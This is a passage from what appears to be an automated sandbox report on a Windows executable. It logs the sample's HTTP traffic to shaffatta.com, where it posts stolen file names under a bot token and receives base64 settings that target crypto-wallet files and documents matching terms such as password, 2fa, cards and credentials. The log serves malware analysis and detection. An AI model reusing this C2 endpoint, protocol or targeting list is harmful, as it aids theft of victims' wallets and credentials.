                                                                                                    Data Ascii: M=u=uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPj
                                                                                                    2024-05-03 09:21:44 UTC16384INData Raw: 90 f2 00 10 a8 01 74 06 81 c9 00 20 00 00 83 f8 18 0f 8d 16 02 00 00 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43
                                                                                                    Data Ascii: t ttt@++t+t+u+uQ<0|*<9&w/c5~bASJC
                                                                                                    2024-05-03 09:21:44 UTC15629INData Raw: 81 48 76 d4 fa 35 9f 1e 1f d6 82 00 4c 28 61 99 31 a8 44 97 46 8b 9a 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72
                                                                                                    Data Ascii: Hv5L(a1DFNT@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Cor


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.449752168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:44 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1067
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:44 UTC1067OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 4e 62 33 70 70 62 47 78 68 49 45 5a 70 63
                                                                                                    Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb3ppbGxhIEZpc
                                                                                                    2024-05-03 09:21:45 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.449753168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:47 UTC200OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIII
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 267
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:47 UTC267OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49
                                                                                                    Data Ascii: ------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="message"wallets------ECAKECAEGDHI
                                                                                                    2024-05-03 09:21:47 UTC207INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 2408
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:47 UTC2408INData Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d
                                                                                                    Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXM


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.449754168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:48 UTC200OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJD
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 265
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:48 UTC265OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41
                                                                                                    Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="message"files------DHJDAKEGDBFHCA
                                                                                                    2024-05-03 09:21:48 UTC206INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 908
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:48 UTC908INData Raw: 5a 47 56 7a 61 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 6a 62 32 52 6c 63 79 6f 73 4b 6a 4a 6d 59 53 6f 73 4b 6d 6c 69 59 57 34 71 4c 43 70 6a 59 58 4a 6b 63 79 6f 73 4b 6d 4a 68 62 6d 74 7a 4b 69 77 71 59 33 5a 32 4b 69 77 71 59 33 5a 6a 4b 69 77 71 59 57 4e 6a 62 33 56 75 64 43 6f 73 4b 6d 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 4b 69 77 71 59 6d 6c 30 59 32 39 70 62 69 6f 73 4b 6d 56 30 61 47 56 79 5a 58 56 74 4b 69 77 71 59 6d 46 75 61 79 6f 73 4b 6e 42 68 63 33 4e 33 62 33 4a 6b 4b 69 77 71 64 32 46 73 62 47 56 30 4b 69 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 76 59 79 77 71 63 32 56 6a 63 6d 56 30 4b 69 77 71 4c 6e 4a 30 5a 69 77 67 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 43 77 71 4c 6e 68 73 63 79 6f 73 4b 69 35 30 65 48 51
                                                                                                    Data Ascii: ZGVza3wlREVTS1RPUCVcfCpjb2RlcyosKjJmYSosKmliYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosKmNyZWRlbnRpYWxzKiwqYml0Y29pbiosKmV0aGVyZXVtKiwqYmFuayosKnBhc3N3b3JkKiwqd2FsbGV0KiwqLnR4dCwqLmRvYywqc2VjcmV0KiwqLnJ0ZiwgKi5kb2N4LCoueGxzeCwqLnhscyosKi50eHQ


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.449755168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:49 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:49 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 42 53 56 68 42 51 31 5a 5a 51
                                                                                                    Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
                                                                                                    2024-05-03 09:21:49 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.449756168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:49 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:49 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 42 53 56 68 42 51 31 5a 5a 51
                                                                                                    Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
                                                                                                    2024-05-03 09:21:50 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.449757168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:52 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:52 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 45 56 45 4a 61 52 30 6c 50 54
                                                                                                    Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xEVEJaR0lPT
                                                                                                    2024-05-03 09:21:52 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.449758168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:52 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:52 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 45 56 45 4a 61 52 30 6c 50 54
                                                                                                    Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xEVEJaR0lPT
                                                                                                    2024-05-03 09:21:53 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.449759168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:53 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:53 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 53 46 42 4c 53 56 70 56 56
                                                                                                    Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOSFBLSVpVV
                                                                                                    2024-05-03 09:21:54 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.449760168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:54 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:54 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 53 46 42 4c 53 56 70 56 56
                                                                                                    Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOSFBLSVpVV
                                                                                                    2024-05-03 09:21:55 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.449761168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:55 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
